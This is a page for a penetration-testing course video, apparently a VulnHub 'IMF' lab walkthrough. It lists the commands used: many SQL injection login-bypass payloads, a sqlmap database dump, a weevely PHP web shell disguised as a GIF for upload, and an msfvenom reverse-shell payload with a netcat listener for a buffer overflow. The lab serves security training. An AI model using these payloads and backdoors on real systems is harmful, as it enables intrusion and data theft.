Videos

Published on June 16th, 2019 📆 | 6281 Views ⚑

0

IMF Walkthrough (VulnHub)

https://www.ispeech.org/text.to.speech

https://www.udemy.com/hands-on-penetration-testing-labs-30/?couponCode=NINE99

https://www.udemy.com/hands-on-penetration-testing-labs-20/?couponCode=NINE99

https://www.udemy.com/kali-linux-web-app-pentesting-labs/?couponCode=NINE99

https://www.udemy.com/kali-linux-hands-on-penetration-testing-labs/?couponCode=NINE99

https://www.udemy.com/network-security-analysis-using-wireshark-snort-and-so/?couponCode=NINE99

https://www.udemy.com/snort-intrusion-detection-rule-writing-and-pcap-analysis/?couponCode=NINE99

Description:

This video from my Udemy course "Hands-on Penetration Testing Labs 3.0" will show you how enumerate and exploit the intentionally vulnerable VM named IMF.

Check below for relevant commands and URLs.

Commands:

netdiscover -i eth1

nmap -p- -A (IP)

view-source:http://192.168.56.109/contact.php

echo `echo "YWxsdGhlZmlsZXM=" | base64 --decode`
echo `echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 --decode`

SQL injection payloads:
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --

sqlmap -r sqli1 --risk=3 --level=5 --dbs --dump --batch --threads=10

weevely generate jesse backdoorz.php

mv backdoorz.php backdoorz.gif

GIF89a34444

weevely http://192.168.56.109/imfadministrator/uploads/3e085014f2a4.gif jesse

find / -name agent &(angle bracket)/dev/null

/usr/local/bin/agent

cd /usr/local/bin/

netstat -ant
nc 127.0.0.1 7788

cat /usr/local/bin/access_codes

knock 192.168.56.109 -v 7482 8279 9467

nmap -p7788 192.168.56.109

git clone https://github.com/avast/retdec.git

apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz

cd retdec
mkdir build && cd build
cmake .. -DCMAKE_INSTALL_PREFIX=~/retdec
make && make install

on the weevely shell - :file_download /usr/local/bin/agent ~/retdec/bin

./retdec-decompiler.py agent

cat agent* | less -Sr

echo $((0x2ddd984))

chmod +x agent

python -c 'print "A" * 200'

locate pattern_create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

gdb agent
run
48093572

locate pattern_offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4448 -f python -b "x00x0ax0d"
00 for NULL
0A for Line Feed n
0D for Carriage Return r

nc -nlvp 4448
python agentsploit.py 192.168.56.109 7788

echo `echo "YWxsdGhlZmlsZXM=" | base64 --decode`

URLs:

https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
https://zxing.org/w/decode.jspx
https://github.com/grongor/knock.git
https://github.com/jessekurrus/agentsploit/blob/master/agentsploit.py
https://www.vulnhub.com/entry/imf-1,162/

source

Tagged with: camera phone • free • IMF • pentesting tutorials • sharing • upload • video • video phone • vulnhub • walkthrough